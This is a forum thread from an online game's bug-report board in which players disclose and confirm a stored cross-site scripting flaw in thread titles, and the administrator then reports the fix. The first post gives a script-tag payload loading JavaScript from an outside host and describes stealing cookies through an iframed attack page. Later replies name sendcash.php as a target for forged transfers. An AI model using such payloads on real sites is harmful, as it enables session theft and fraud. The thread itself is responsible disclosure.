Forums
First  << 1 >>  Last
Forum Main>>Bugs & Issues>> XSS/HTML Attack in topic title
1445055
ID: 1445055
Level: 29
Posts: 2579
Score: 2177
1445055 [1445055]Reply | Quote | Report

Thread created on Fri Oct 12, 2012 12:41:26
Last replied to on Mon Oct 15, 2012 01:47:47
Basically when you FIRST create a thread the title is injectable.

The title doesn't give you much space but you can easily embed a script element going to an external server.

Example: <script src=http://plornt.com/j.js>


(Add the html tags yourself to the script element above)

I know this is rather obvious but it can also be hidden in the fact that I could post it to one of those 'hidden'(non-existant) forums if they still exist and then include an iframe to that forum page via a attack site and then direct you there. After that I could steal your cookies! But yeah I personally would never do that ;D and Im fairly sure no one else would but its always better to be safe than sorry.

Last Edited: Fri Oct 12, 2012 12:48:00
REDACTED
Super secret reinforced spam barrier 2.0
RatedR

ID: 72498
Level: 75
Posts: 17314
Score: 10412
RatedR [72498]Reply | Quote | Report

Posted on Fri Oct 12, 2012 14:42:34
For Ched

Super secret reinforced spam barrier 2.0
Chedburn

ID: 1
Level: 31
Posts: 6499
Score: 11175
Chedburn [1]Reply | Quote | Report

Posted on Fri Oct 12, 2012 15:19:53
newtopic.php goes through all our usual protections. I.e. stripping all kinds of things.

Are you sure this is a problem? Could you perhaps make an example for us in the bugs & issues forum?

Thanks.

Super secret reinforced spam barrier 2.0
1445055
ID: 1445055
Level: 29
Posts: 2579
Score: 2177
1445055 [1445055]Reply | Quote | Report

Posted on Fri Oct 12, 2012 22:37:49
Here you are: http://www.torn.com/forums.php?forumID=19&ID=14881836

It's specifically where the title of the post is

Screenshot: i.imgur.com/7vUXn.png

Last Edited: Fri Oct 12, 2012 22:39:33
REDACTED
Super secret reinforced spam barrier 2.0
cyberdude

ID: 1613175
Level: 37
Posts: 429
Score: 541
NuBzcyberdude [1613175]Reply | Quote | Report

Posted on Sat Oct 13, 2012 00:00:10
This is definitely confirmed, and a mayor bummer.
Well spotted Plornt, I was of the impression that they fixed these XSS.

Tested on faction forum.

Fix required ASAP, this has potential to wreck havok... It's not that difficult to trigger sendcash.php included the correct rfc value



Last Edited: Sat Oct 13, 2012 00:15:27
Super secret reinforced spam barrier 2.0
MightyGoober

ID: 812478
Level: 55
Posts: 625
Score: 178
IBBMightyGoober [812478]Reply | Quote | Report

Posted on Sun Oct 14, 2012 22:48:45
Not as bad as SQL injection, but as cyberdudedk has pointed out... the sendcash.php might be a nice place to start.

Full time programmer & business owner.
Check our games out? facebook.com/j3.gaming
Super secret reinforced spam barrier 2.0
Chedburn

ID: 1
Level: 31
Posts: 6499
Score: 11175
Chedburn [1]Reply | Quote | Report

Posted on Mon Oct 15, 2012 01:47:47
I've fixed this, and introduced more smaller issues in the process. The sooner we get rid of this old forum engine the better

Thanks.

Forum Main>>Bugs & Issues>> XSS/HTML Attack in topic title
First  << 1 >>  Last